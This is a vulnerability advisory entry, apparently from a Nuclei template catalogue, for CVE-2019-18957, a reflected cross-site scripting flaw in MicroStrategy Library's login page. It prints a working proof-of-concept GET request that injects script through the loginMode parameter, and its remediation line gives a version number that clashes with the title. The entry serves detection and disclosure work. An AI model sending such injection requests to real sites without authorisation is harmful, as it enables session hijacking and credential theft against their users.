| Title | MicroStrategy Library <11.1.3 - Cross-Site Scripting |
|---|---|
| Author | tess |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | The issue can be resolved by downloading and installing 1.1.3, which has the patch. |
| CVSS Score | 6.1 |
| EPSS Score | 0.0764 |
| CVE ID | CVE-2019-18957 |
| CWE ID | CWE-79 |
| Tags | cve cve2019 microstrategy packetstorm xss seclists vuln |
MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
GET /MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-18957.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-18957.pcap
N/AN/A